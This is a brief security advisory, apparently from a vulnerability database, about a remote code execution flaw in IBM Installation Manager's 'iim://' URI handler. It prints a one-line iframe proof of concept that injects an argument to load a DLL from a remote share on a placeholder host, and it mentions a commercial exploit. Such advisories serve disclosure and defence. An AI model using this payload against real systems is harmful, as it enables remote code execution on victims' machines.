|
IBM Installation Manager 'iim://' URI Handling Remote Code Execution Vulnerability
The following proof of concept is available: <iframe src='iim://" -vm \\www.example.com\uncshare\sh.dll -url "'></iframe> Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild. |
|
Privacy Statement |